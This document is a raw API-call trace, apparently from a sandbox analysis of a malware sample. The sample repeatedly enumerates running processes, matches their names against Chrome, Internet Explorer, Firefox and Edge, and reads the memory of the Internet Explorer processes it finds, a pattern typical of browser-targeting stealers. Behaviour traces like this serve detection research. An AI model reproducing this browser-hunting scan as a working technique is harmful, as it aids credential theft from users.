	[0204.661] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0204.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.661] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.662] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0204.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.663] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.663] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0204.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x29c8
	[0204.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.664] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0204.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.664] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.665] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0204.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.665] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.666] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0204.666] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x29cc
	[0204.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.666] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0204.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.667] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.668] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0204.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.668] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.669] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0204.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x29d0
	[0204.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.669] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0204.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.670] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.670] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0204.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.671] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.671] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x29d4
	[0204.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.672] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.676] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.677] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.677] NtQueryInformationProcess (in: ProcessHandle=0x29d4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.677] ReadProcessMemory (in: hProcess=0x29d4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.677] ReadProcessMemory (in: hProcess=0x29d4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.677] ReadProcessMemory (in: hProcess=0x29d4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.677] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.677] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0204.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x29d8
	[0204.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.678] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0204.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.678] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0204.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.679] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0204.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.679] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.679] NtQueryInformationProcess (in: ProcessHandle=0x29d8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0204.679] ReadProcessMemory (in: hProcess=0x29d8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0204.679] ReadProcessMemory (in: hProcess=0x29d8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0204.679] ReadProcessMemory (in: hProcess=0x29d8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0204.679] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0204.680] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x29dc
	[0204.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.680] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.681] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.681] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.681] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.682] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0204.682] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x29e0
	[0204.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.682] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0204.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.683] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.683] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0204.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.684] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.684] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.684] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x29e4
	[0204.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.685] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.685] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.685] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.686] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.686] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x29e8
	[0204.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.687] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.688] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.691] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.691] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.692] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0204.692] CloseHandle (hObject=0x188) returned 1
	[0204.692] Sleep (dwMilliseconds=0x64) 
	[0204.798] GetCurrentProcessId () returned 0x110
	[0204.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0204.801] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0204.802] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0204.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0204.803] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x29ec
	[0204.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.803] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.804] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.804] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.804] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.804] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.804] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x29f0
	[0204.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.805] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.806] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.806] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.806] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.806] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0204.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x29f4
	[0204.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.807] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0204.807] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.807] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.808] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0204.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.808] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.809] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0204.809] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x29f8
	[0204.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.809] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0204.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.810] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.810] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0204.810] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.810] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.810] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0204.811] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x29fc
	[0204.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.811] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0204.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.812] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.812] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0204.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.812] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.812] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0204.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2a00
	[0204.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.813] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0204.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.814] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.814] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0204.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.814] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.815] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0204.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2a04
	[0204.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.815] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0204.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.816] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.816] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0204.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.816] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.816] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0204.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2a08
	[0204.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.817] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.817] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.818] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.818] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.818] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.818] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.819] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x2a0c
	[0204.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.819] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.819] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.819] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.820] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.820] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.820] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.821] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x2a10
	[0204.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.821] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.821] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.822] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.822] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.822] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.823] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x2a14
	[0204.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.823] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.823] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.823] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.823] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.824] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.824] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.825] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x2a18
	[0204.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.825] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.825] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.825] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.826] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
